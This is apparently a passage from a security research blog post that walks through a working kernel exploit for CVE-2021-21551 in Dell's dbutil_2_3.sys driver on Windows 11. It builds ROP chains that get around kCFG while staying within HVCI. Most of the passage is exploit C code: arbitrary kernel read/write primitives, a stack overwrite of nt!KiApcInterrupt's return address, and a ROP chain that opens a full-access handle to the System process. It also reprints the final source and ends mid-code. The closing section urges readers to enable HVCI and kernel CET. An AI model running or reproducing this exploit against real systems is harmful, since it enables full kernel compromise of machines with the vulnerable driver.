The function that was called after nt!PspUserThreadStartup was nt!KiApcInterrupt. As the name insinuates, the function is responsible for an APC interrupt! We know APC interrupts are processed at IRQL APC_LEVEL - or 1. However, we also know that only interrupts which are processed at a higher IRQL than the current processors’ IRQL level can cause the processor to be interrupted.

Since we can obviously see that an APC interrupt was dispatched, we can confirm that the processor must have been executing at IRQL 0, or PASSIVE_LEVEL - which allowed the APC interrupt to occur. This again, comes back to the fact that queuing an APC causes an interrupt. Since APCs are processed at IRQL APC_LEVEL (1), the processor must be executing at PASSIVE_LEVEL (0) in order for an interrupt for an APC to be issued.

If we look at return address - we can see nt!KiApcInterrupt+0x328 (TrapFrame @ ffffa385bba350a0) contains a trap frame - which is basically a representation of the state of execution when an interrupt takes place. If we examine this trap frame - we can see that RIP was executing the instruction after the mov cr8, r15 instruction - which changes the processor where the APC interrupt was dispatched - meaning that when nt!PspUserThreadStartup executed - it allowed the processor to start allowing things like APCs to interrupt execution!

We can come to the conclusion that nt!KiApcInterrupt was executed as a result of the mov cr8, r15 instruction from nt!PspUserThreadStartup - which lowered the current processors’ IRQL level to PASSIVE_LEVEL (0). Since APCs are processed in APC_LEVEL (1), this allowed the interrupt to occur - because the processor was executing at a lower IRQL before the interrupt was issued.

The point of examining this is to understand the fact that an interrupt basically occurred, as a result of the APC being queued on our “dummy” thread. This APC is telling the thread basically to “do nothing” - which is essentially what a suspended thread is. Here is where this comes into play for us.

When this thread is resumed, the thread will return from the nt!KiApcInterrupt function. So, what we can do is we can overwrite the return address on the stack for nt!KiApcInterrtupt with the address of a ROP gadget (the return address on this system used for this blog post is nt!KiApcInterrupt + 0x328 - but that could be subject to change). Then, when we resume the thread eventually (which can be done from user mode) - nt!KiApcInterrupt will return and it will use our ROP gadget as the return address. This will allow us to construct a ROP chain which will allow us to call arbitrary kernel-mode APIs! The key, first, is to use our leaked KTHREAD object and parse the StackBase member - using our arbitrary read primitive - to locate the stack (where this return address lives). To do this, we will being the prototype for our final “exploit” function titled constructROPChain().

Notice the last parameter our function receives - ULONG64 ntBase. Since we are going to be using ROP gadgets from ntoskrnl.exe, we need to locate the base address of ntoskrnl.exe in order to resolve our needed ROP gadgets. So, this means that we also need a function which resolves the base of ntoskrnl.exe using EnumDeviceDrivers. Here is how we instrument this functionality.

/**
 * @brief Function used resolve the base address of ntoskrnl.exe.
 * @param Void.
 * @return ntoskrnl.exe base
 */
ULONG64 resolventBase(void)
{
	//
	// Array to receive kernel-mode addresses
	//
	LPVOID* lpImageBase = NULL;

	//
	// Size of the input array
	//
	DWORD cb = 0;

	//
	// Size of the array output (all load addresses).
	//
	DWORD lpcbNeeded = 0;

	//
	// Invoke EnumDeviceDrivers (and have it fail)
	// to receive the needed size of lpImageBase
	//
	EnumDeviceDrivers(
		lpImageBase,
		cb,
		&lpcbNeeded
	);

	//
	// lpcbNeeded should contain needed size
	//
	lpImageBase = (LPVOID*)malloc(lpcbNeeded);

	//
	// Error handling
	//
	if (lpImageBase == NULL)
	{
		//
		// Bail out
		// 
		goto exit;
	}

	//
	// Assign lpcbNeeded to cb (cb needs to be size of the lpImageBase
	// array).
	//
	cb = lpcbNeeded;

	//
	// Invoke EnumDeviceDrivers properly.
	//
	BOOL getAddrs = EnumDeviceDrivers(
		lpImageBase,
		cb,
		&lpcbNeeded
	);

	//
	// Error handling
	//
	if (!getAddrs)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// The first element of the array is ntoskrnl.exe.
	//
	return (ULONG64)lpImageBase[0];

//
// Execution reaches here if an error occurs
//
exit:

	//
	// Return an error.
	//
	return (ULONG64)1;
}

The above function called resolventBase() returns the base address of ntoskrnl.exe (this type of enumeration couldn’t be done in a low-integrity process. Again, we are assuming medium integrity). This value can then be passed in to our constructROPChain() function.

If we examine the contents of a KTHREAD structure, we can see that StackBase is located at an offset of 0x38 within the KTHREAD structure. This means we can use our arbitrary read primitive to leak the stack address of the KTHREAD object by dereferencing this offset.

We then can update main() to resolve ntoskrnl.exe and to leak our kernel-mode stack (while leaving getchar() to confirm we can leak the stack before letting the process which houses our “dummy thread” terminate.

/**
 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
 */
int main(void)
{
	//
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	//
	HANDLE driverHandle = getHandle();

	//
	// Error handling
	//
	if (driverHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	//
	// Invoke getthreadHandle() to create our "dummy thread"
	//
	HANDLE getthreadHandle = createdummyThread();

	//
	// Error handling
	//
	if (getthreadHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Created the \"dummy thread\"!\n");

	//
	// Invoke leakKTHREAD()
	//
	ULONG64 kthread = leakKTHREAD(getthreadHandle);

	//
	// Error handling (Negative value? NtQuerySystemInformation returns a negative NTSTATUS if it fails)
	//
	if ((!kthread & 0x80000000) == 0x80000000)
	{
		//
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Error handling (kthread isn't negative - but is it a kernel-mode address?)
	//
	else if ((!kthread & 0xffff00000000000) == 0xffff00000000000 || ((!kthread & 0xfffff00000000000) == 0xfffff00000000000))
	{
		//
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] \"Dummy thread\" KTHREAD object: 0x%llx\n", kthread);

	//
	// Invoke resolventBase() to retrieve the load address of ntoskrnl.exe
	//
	ULONG64 ntBase = resolventBase();

	//
	// Error handling
	//
	if (ntBase == (ULONG64)1)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// Invoke constructROPChain() to build our ROP chain and kick off execution
	//
	BOOL createROP = constructROPChain(driverHandle, getthreadHandle, kthread, ntBase);

	//
	// Error handling
	//
	if (!createROP)
	{
		//
		// Print update
		//
		printf("[-] Error! Unable to construct the ROP chain. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// getchar() to pause execution
	//
	getchar();

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return 1;
}

After running the exploit (in its current state) we can see that we successfully leaked the stack for our “dummy thread” - located at 0xffffa385b8650000.

Recall also that the stack grows towards the lower memory addresses - meaning that the stack base won’t actually have (usually) memory paged in/committed. Instead, we have to start going “up” the stack (by going down - since the stack grows towards the lower memory addresses) to see the contents of the “dummy thread’s” stack.

Putting all of this together, we can extend the contents of our constructROPChain() function to search our dummy thread’s stack for the target return address of nt!KiApcInterrupt + 0x328. nt!KiApcInterrupt + 0x328 is located at an offset of 0x41b718 on the version of Windows 11 I am testing this exploit on.

/**
 * @brief Function used write a ROP chain to the kernel-mode stack
 *
 * This function takes the previously-leaked KTHREAD object of
 * our "dummy thread", extracts the StackBase member of the object
 * and writes the ROP chain to the kernel-mode stack leveraging the
 * write64() function.
 *
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param dummyThread - A valid handle to our "dummy thread" in order to resume it.
 * @param KTHREAD - The KTHREAD object associated with the "dummy" thread.
 * @param ntBase - The base address of ntoskrnl.exe.
 * @return Result of the operation in the form of a boolean.
 */
BOOL constructROPChain(HANDLE inHandle, HANDLE dummyThread, ULONG64 KTHREAD, ULONG64 ntBase)
{
	//
	// KTHREAD.StackBase = KTHREAD + 0x38
	//
	ULONG64 kthreadstackBase = KTHREAD + 0x38;

	//
	// Dereference KTHREAD.StackBase to leak the stack
	//
	ULONG64 stackBase = read64(inHandle, kthreadstackBase);

	//
	// Error handling
	//
	if (stackBase == (ULONG64)1)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Leaked kernel-mode stack: 0x%llx\n", stackBase);

	//
	// Variable to store our target return address for nt!KiApcInterrupt
	//
	ULONG64 retAddr = 0;

	//
	// Leverage the arbitrary write primitive to read the entire contents of the stack (seven pages = 0x7000)
	// 0x7000 isn't actually commited, so we start with 0x7000-0x8, since the stack grows towards the lower
	// addresses.
	//
	for (int i = 0x8; i < 0x7000 - 0x8; i += 0x8)
	{
		//
		// Invoke read64() to dereference the stack
		//
		ULONG64 value = read64(inHandle, stackBase - i);

		//
		// Kernel-mode address?
		//
		if ((value & 0xfffff00000000000) == 0xfffff00000000000)
		{
			//
			// nt!KiApcInterrupt+0x328?
			//
			if (value == ntBase + 0x41b718)
			{
				//
				// Print update
				//
				printf("[+] Leaked target return address of nt!KiApcInterrupt!\n");

				//
				// Store the current value of stackBase - i, which is nt!KiApcInterrupt+0x328
				//
				retAddr = stackBase - i;

				//
				// Break the loop if we find our address
				//
				break;
			}
		}

		//
		// Reset the value
		//
		value = 0;
	}

	//
	// Print update
	//
	printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return the NTSTATUS error
	//
	return (ULONG64)1;
}

Again, we use getchar() to pause execution so we can inspect the thread before the process terminates. After executing the above exploit, we can see the ability to locate where nt!KiApcInterrupt + 0x328 exists on the stack.

We have now successfully located our target return address! Using our arbitrary write primitive, let’s overwrite the return address with 0x4141414141414141 - which should cause a system crash when our thread is resumed.

//
// Print update
//
printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

//
// Our ROP chain will start here
//
write64(inHandle, retAddr, 0x4141414141414141);

//
// Resume the thread to kick off execution
//
ResumeThread(dummyThread);

As we can see - our system has crashes and we control RIP! The system is attempting to return into the address 0x4141414141414141 - meaning we now control execution at the kernel level and we can now redirect execution into our ROP chain.

We also know the base address of ntoskrnl.exe, meaning we can resolve our needed ROP gadgets to arbitrarily invoke a kernel-mode API. Remember - just like DEP - ROP doesn’t actually execute unsigned code. We “resuse” existing signed code - which stays within the bounds of HVCI. Although it is a bit more arduous, we can still invoke arbitrary APIs - just like shellcode.

So let’s put together a proof-of-concept to arbitrarily call PsGetCurrentProcess - which should return a pointer to the EPROCESS structure associated with process housing the thread our ROP chain is executing in (our “dummy thread”). We also (for the purposes of showing it is possible) will save the result in a user-mode address so (theoretically) we could act on this object later.

Here is how our ROP chain will look.

This ROP chain places nt!PsGetCurrentProcess into the RAX register and then performs a jmp rax to invoke the function. This function doesn’t accept any parameters, and it returns a pointer to the current processes’ EPROCESS object. The calculation of this function’s address can be identified by calculating the offset from ntoskrnl.exe.

We can begin to debug the ROP chain by setting a breakpoint on the first pop rax gadget - which overwrites nt!KiApcInterrupt + 0x328.

After the pop rax occurs - nt!PsGetCurrentProcess is placed into RAX. The jmp rax gadget is dispatched - which invokes our call to nt!PsGetCurrentProcess (which is an extremely short function that only needs to index the KPRCB structure).

After completing the call to nt!PsGetCurrentProcess - we can see a user-mode address on the stack, which is placed into RCX and is used with a mov qword ptr [rcx], rax gadget.

This is a user-mode address supplied by us. Since nt!PsGetCurrentProcess returns a pointer to the current process (in the form of an EPROCESS object) - an attacker may want to preserve this value in user-mode in order to re-use the arbitrary write primitive and/or read primitive to further corrupt this object.

You may be thinking - what about Supervisor Mode Access Prevention (SMAP)? SMAP works similarly to SMEP - except SMAP doesn’t focus on code execution. SMAP prevents any kind of data access from ring 0 into ring 3 (such as copying a kernel-mode address into a user-mode address, or performing data access on a ring 3 page from ring 0). However, Windows only employs SMAP in certain situations - most notably when the processor servicing the data-operation is at an IRQL 2 and above. Since kernel-mode code runs at an IRQL of 0, this means SMAP isn’t “in play” - and therefore we are free to perform our data operation (saving the EPROCESS object into user-mode).

We have now completed the “malicious” call and we have successfully invoked an arbitrary API of our choosing - without needing to detonate any unsigned-code. This means we have stepped around HVCI by staying compliant with it (e.g. we didn’t turn HVCI off - we just stayed within the guidelines of HVCI). kCFG was bypassed in this instance (we took control of RIP) by overwriting a return address, similarly to my last blog series on browser exploitation. Intel CET in the Windows kernel would have prevent this from happening.

Since we are using ROP, we need to restore our execution now. This is due to the fact we have completely altered the state of the CPU registers and we have corrupted the stack. Since we have only corrupted the “dummy thread” - we simply can invoke nt!ZwTerminateThread, while passing in the handle of the dummy thread, to tell the Windows OS to do this for us! Remember - the “dummy thread” is only being used for the arbitrary API call. There are still other threads (the main thread) which actually executes code within Project2.exe. Instead of manually trying to restore the state of the “dummy thread” - and avoid a system crash - we simply can just ask Windows to terminate the thread for us. This will “gracefully” exit the thread, without us needing to manually restore everything ourselves.

nt!ZwTerminateThread accepts two parameters. It is an undocumented function, but it actually receives the same parameters as prototyped by its user-mode “cousin”, TerminateThread.

All we need to pass to nt!ZwTerminateThread is a handle to the “dummy thread” (the thread we want to terminate) and an NTSTATUS code (we will just use STATUS_SUCCESS, which is a value of 0x00000000). So, as we know, our first parameter needs to go into the RCX register (the handle to the “dummy thread”).

As we can see above, our handle to the dummy thread will be placed into the RCX register. After this is placed into the RCX register, our exit code for our thread (STATUS_SUCCESS, or 0x00000000) is placed into RDX.

Now we have our parameters setup for nt!ZwTerminateThread. All that there is left now is to place nt!ZwTerminateThread into RAX and to jump to it.

You’ll notice, however, that instead of hitting the jmp rax gadget - we hit another ret after the ret issued from the pop rax ; ret gadget. Why is this? Take a closer look at the stack.

When the jmp rax instruction is dispatched (nt!_guard_retpoline_indeirect_rax+0x5e) - the stack is in a 16-byte alignment (a 16-byte alignment means that the last two digits of the virtual address, e.g. 0xffffc789dd19d160, which would be 60, end with a 0). Windows API calls sometimes use the XMM registers, under the hood, which allow memory operations to be facilitated in 16-byte intervals. This is why when Windows API calls are made, they must (usually) be made in 16-byte alignments! We use the “extra” ret gadget to make sure that when jmp nt!ZwTerminateThread dispatches, that the stack is properly aligned.

From here we can execute nt!ZwTerminateThread.

From here we can press g in the debugger - as the Windows OS will gracefully exit us from the thread!

As we can see, we have our EPROCESS object in the user-mode cmd.exe console! We can cross-reference this address in WinDbg to confirm.

Parsing this address as an EPROCESS object, we can confirm via the ImageFileName that this is the EPROCESS object associated with our current process! We have successfully executed a kernel-mode function call, from user-mode (via our vulnerability), while not triggering kCFG or HVCI!

Bonus ROP Chain

Our previous nt!PsGetCurrentProcess function call outlined how it is possible to call kernel-mode functions via an arbitrary read/write primitive, from user-mode, without triggering kCFG and HVCI. Although we won’t step through each gadget, here is a “bonus” ROP chain that you could use, for instance, to open up a PROCESS_ALL_ACCESS handle to the System process with HVCI and kCFG enabled (don’t forget to declare CLIENT_ID and OBJECT_ATTRIBUTE structures!).

	//
	// Print update
	//
	printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

	//
	// Handle to the System process
	//
	HANDLE systemprocHandle = NULL;

	//
	// CLIENT_ID
	//
	CLIENT_ID clientId = { 0 };
	clientId.UniqueProcess = ULongToHandle(4);
	clientId.UniqueThread = NULL;

	//
	// Declare OBJECT_ATTRIBUTES
	//
	OBJECT_ATTRIBUTES objAttrs = { 0 };

	//
	// memset the buffer to 0
	//
	memset(&objAttrs, 0, sizeof(objAttrs));

	//
	// Set members
	//
	objAttrs.ObjectName = NULL;
	objAttrs.Length = sizeof(objAttrs);
	
	//
	// Begin ROP chain
	//
	write64(inHandle, retAddr, ntBase + 0xa50296);				// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x8, &systemprocHandle);		// HANDLE (to receive System process handle)
	write64(inHandle, retAddr + 0x10, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x18, PROCESS_ALL_ACCESS);		// PROCESS_ALL_ACCESS
	write64(inHandle, retAddr + 0x20, ntBase + 0x2e8281);		// 0x1402e8281: pop r8 ; ret ; \x41\x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x28, &objAttrs);				// OBJECT_ATTRIBUTES
	write64(inHandle, retAddr + 0x30, ntBase + 0x42a123);		// 0x14042a123: pop r9 ; ret ; \x41\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x38, &clientId);				// CLIENT_ID
	write64(inHandle, retAddr + 0x40, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x48, ntBase + 0x413210);		// nt!ZwOpenProcess
	write64(inHandle, retAddr + 0x50, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	write64(inHandle, retAddr + 0x58, ntBase + 0xa50296);		// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x60, (ULONG64)dummyThread);	// HANDLE to the dummy thread
	write64(inHandle, retAddr + 0x68, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x70, 0x0000000000000000);		// Set exit code to STATUS_SUCCESS
	write64(inHandle, retAddr + 0x78, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x80, ntBase + 0x4137b0);		// nt!ZwTerminateThread
	write64(inHandle, retAddr + 0x88, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	
	//
	// Resume the thread to kick off execution
	//
	ResumeThread(dummyThread);

	//
	// Sleep Project2.exe for 1 second to allow the print update
	// to accurately display the System process handle
	//
	Sleep(1000);

	//
	// Print update
	//
	printf("[+] System process HANDLE: 0x%p\n", systemprocHandle);

What’s nice about this technique is the fact that all parameters can be declared in user-mode using C - meaning we don’t have to manually construct our own structures, like a CLIENT_ID structure, in the .data section of a driver, for instance.

Conclusion

I would say that HVCI is easily one of the most powerful mitigations there is. As we saw - we actually didn’t “bypass” HVCI. HVCI mitigates unsigned-code execution in the VTL 0 kernel - which is something we weren’t able to achieve. However, Microsoft seems to be dependent on Kernel CET - and when you combine kCET, kCFG, and HVCI - only then do you get coverage against this technique.

HVCI is probably not only the most complex mitigation I have looked at, not only is it probably the best, but it taught me a ton about something I didn’t know (hypervisors). HVCI, even in this situation, did its job and everyone should please go and enable it! When coupled with CET and kCFG - it will make HVCI resilient against this sort of attack (just like how MBEC makes HVCI resilient against PTE modification).

It is possible to enable kCET if you have a supported processor - as in many cases it isn’t enabled by default. You can do this via regedit.exe by adding a value called Enabled - which you need to set to 1 (as a DWORD) - to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelShadowStacks key. Shoutout to my coworker Yarden Shafir for showing me this! Thanks for tuning in!

Here is the final code (nt!ZwOpenProcess).

Definitions in ntdll.h:

#include <Windows.h>
#include <Psapi.h>
#include <time.h>

typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation,
    SystemProcessorInformation,
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemPathInformation,
    SystemProcessInformation,
    SystemCallCountInformation,
    SystemDeviceInformation,
    SystemProcessorPerformanceInformation,
    SystemFlagsInformation,
    SystemCallTimeInformation,
    SystemModuleInformation,
    SystemLocksInformation,
    SystemStackTraceInformation,
    SystemPagedPoolInformation,
    SystemNonPagedPoolInformation,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPageFileInformation,
    SystemVdmInstemulInformation,
    SystemVdmBopInformation,
    SystemFileCacheInformation,
    SystemPoolTagInformation,
    SystemInterruptInformation,
    SystemDpcBehaviorInformation,
    SystemFullMemoryInformation,
    SystemLoadGdiDriverInformation,
    SystemUnloadGdiDriverInformation,
    SystemTimeAdjustmentInformation,
    SystemSummaryMemoryInformation,
    SystemMirrorMemoryInformation,
    SystemPerformanceTraceInformation,
    SystemObsolete0,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegistryQuotaInformation,
    SystemExtendServiceTableInformation,
    SystemPrioritySeperation,
    SystemVerifierAddDriverInformation,
    SystemVerifierRemoveDriverInformation,
    SystemProcessorIdleInformation,
    SystemLegacyDriverInformation,
    SystemCurrentTimeZoneInformation,
    SystemLookasideInformation,
    SystemTimeSlipNotification,
    SystemSessionCreate,
    SystemSessionDetach,
    SystemSessionInformation,
    SystemRangeStartInformation,
    SystemVerifierInformation,
    SystemVerifierThunkExtend,
    SystemSessionProcessInformation,
    SystemLoadGdiDriverInSystemSpace,
    SystemNumaProcessorMap,
    SystemPrefetcherInformation,
    SystemExtendedProcessInformation,
    SystemRecommendedSharedDataAlignment,
    SystemComPlusPackage,
    SystemNumaAvailableMemory,
    SystemProcessorPowerInformation,
    SystemEmulationBasicInformation,
    SystemEmulationProcessorInformation,
    SystemExtendedHandleInformation,
    SystemLostDelayedWriteInformation,
    SystemBigPoolInformation,
    SystemSessionPoolTagInformation,
    SystemSessionMappedViewInformation,
    SystemHotpatchInformation,
    SystemObjectSecurityMode,
    SystemWatchdogTimerHandler,
    SystemWatchdogTimerInformation,
    SystemLogicalProcessorInformation,
    SystemWow64SharedInformation,
    SystemRegisterFirmwareTableInformationHandler,
    SystemFirmwareTableInformation,
    SystemModuleInformationEx,
    SystemVerifierTriageInformation,
    SystemSuperfetchInformation,
    SystemMemoryListInformation,
    SystemFileCacheInformationEx,
    MaxSystemInfoClass

} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 w018;
    WORD                 NameOffset;
    BYTE                 Name[256];
} SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    void* Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

// Prototype for ntdll!NtQuerySystemInformation
typedef NTSTATUS(WINAPI* NtQuerySystemInformation_t)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES;
//
// CVE-2021-21551 (HVCI-compliant)
// Author: Connor McGarr (@33y0re)
//

#include "ntdll.h"
#include <stdio.h>

//
// Vulnerable IOCTL codes
//
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

//
// NTSTATUS codes
//
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_SUCCESS 0x00000000

/**
 * @brief Function to arbitrarily read kernel memory.
 *
 * This function is able to take kernel mode memory, dereference it
 * and return it to user-mode.
 *
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param WHAT - The kernel-mode memory to be dereferenced/read.
 * @return The dereferenced contents of the kernel-mode memory.

 */
ULONG64 read64(HANDLE inHandle, ULONG64 WHAT)
{
	//
	// Buffer to send to the driver (read primitive)
	//
	ULONG64 inBuf[4] = { 0 };

	//
	// Values to send
	//
	ULONG64 one = 0x4141414141414141;
	ULONG64 two = WHAT;
	ULONG64 three = 0x0000000000000000;
	ULONG64 four = 0x0000000000000000;

	//
	// Assign the values
	//
	inBuf[0] = one;
	inBuf[1] = two;
	inBuf[2] = three;
	inBuf[3] = four;

	//
	// Interact with the driver
	//
	DWORD bytesReturned = 0;

	BOOL interact = DeviceIoControl(
		inHandle,
		IOCTL_READ_CODE,
		&inBuf,
		sizeof(inBuf),
		&inBuf,
		sizeof(inBuf),
		&bytesReturned,
		NULL
	);

	//
	// Error handling
	//
	if (!interact)
	{
		//
		// Bail out
		//
		goto exit;

	}
	else
	{
		//
		// Return the QWORD
		//
		return inBuf[3];
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle before exiting
	//
	CloseHandle(
		inHandle
	);

	//
	// Return an error
	//
	return (ULONG64)1;
}

/**
 * @brief Function used to arbitrarily write to kernel memory.
 *
 * This function is able to take kernel mode memory
 * and write user-supplied data to said memory
 * 1 QWORD (ULONG64) at a time.
 *
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param WHERE - The data the user wishes to write to kernel mode.
 * @param WHAT - The kernel-mode memory to be written to.
 * @return Result of the operation in the form of a boolean.
 */
BOOL write64(HANDLE inHandle, ULONG64 WHERE, ULONG64 WHAT)
{
	//
	// Buffer to send to the driver (write primitive)
	//
	ULONG64 inBuf1[4] = { 0 };

	//
	// Values to send
	//
	ULONG64 one1 = 0x4141414141414141;
	ULONG64 two1 = WHERE;
	ULONG64 three1 = 0x0000000000000000;
	ULONG64 four1 = WHAT;

	//
	// Assign the values
	//
	inBuf1[0] = one1;
	inBuf1[1] = two1;
	inBuf1[2] = three1;
	inBuf1[3] = four1;

	//
	// Interact with the driver
	//
	DWORD bytesReturned1 = 0;

	BOOL interact = DeviceIoControl(
		inHandle,
		IOCTL_WRITE_CODE,
		&inBuf1,
		sizeof(inBuf1),
		&inBuf1,
		sizeof(inBuf1),
		&bytesReturned1,
		NULL
	);

	//
	// Error handling
	//
	if (!interact)
	{
		//
		// Bail out
		//
		goto exit;

	}
	else
	{
		//
		// Return TRUE
		//
		return TRUE;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle before exiting
	//
	CloseHandle(
		inHandle
	);

	//
	// Return FALSE (arbitrary write failed)
	//
	return FALSE;
}

/**
 * @brief Function to obtain a handle to the dbutil_2_3.sys driver.
 * @param Void.
 * @return The handle to the driver.
 */
HANDLE getHandle(void)
{
	//
	// Obtain a handle to the driver
	//
	HANDLE driverHandle = CreateFileA(
		"\\\\.\\DBUtil_2_3",
		FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
		0x0,
		NULL,
		OPEN_EXISTING,
		0x0,
		NULL
	);

	//
	// Error handling
	//
	if (driverHandle == INVALID_HANDLE_VALUE)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Return the driver handle
		//
		return driverHandle;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an invalid handle
	//
	return (HANDLE)-1;
}

/**
 * @brief Function used for LPTHREAD_START_ROUTINE
 *
 * This function is used by the "dummy thread" as
 * the entry point. It isn't important, so we can
 * just make it "return"
 *
 * @param Void.
 * @return Void.
 */
void randomFunction(void)
{
	return;
}

/**
 * @brief Function used to create a "dummy thread"
 *
 * This function creates a "dummy thread" that is suspended.
 * This allows us to leak the kernel-mode stack of this thread.
 *
 * @param Void.
 * @return A handle to the "dummy thread"
 */
HANDLE createdummyThread(void)
{
	//
	// Invoke CreateThread
	//
	HANDLE dummyThread = CreateThread(
		NULL,
		0,
		(LPTHREAD_START_ROUTINE)randomFunction,
		NULL,
		CREATE_SUSPENDED,
		NULL
	);

	//
	// Error handling
	//
	if (dummyThread == (HANDLE)-1)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Return the handle to the thread
		//
		return dummyThread;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an invalid handle
	//
	return (HANDLE)-1;
}

/**
 * @brief Function to resolve ntdll!NtQuerySystemInformation.
 *
 * This function is used to resolve ntdll!NtQuerySystemInformation.
 * ntdll!NtQuerySystemInformation allows us to leak kernel-mode
 * memory, useful to our exploit, to user mode from a medium
 * integrity process.
 *
 * @param Void.
 * @return A pointer to ntdll!NtQuerySystemInformation.

 */
NtQuerySystemInformation_t resolveFunc(void)
{
	//
	// Obtain a handle to ntdll.dll (where NtQuerySystemInformation lives)
	//
	HMODULE ntdllHandle = GetModuleHandleW(L"ntdll.dll");

	//
	// Error handling
	//
	if (ntdllHandle == NULL)
	{
		// Bail out
		goto exit;
	}

	//
	// Resolve ntdll!NtQuerySystemInformation
	//
	NtQuerySystemInformation_t func = (NtQuerySystemInformation_t)GetProcAddress(
		ntdllHandle,
		"NtQuerySystemInformation"
	);

	//
	// Error handling
	//
	if (func == NULL)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Print update
		//
		printf("[+] ntdll!NtQuerySystemInformation: 0x%p\n", func);

		//
		// Return the address
		//
		return func;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return (NtQuerySystemInformation_t)1;
}

/**
 * @brief Function used to leak the KTHREAD object
 *
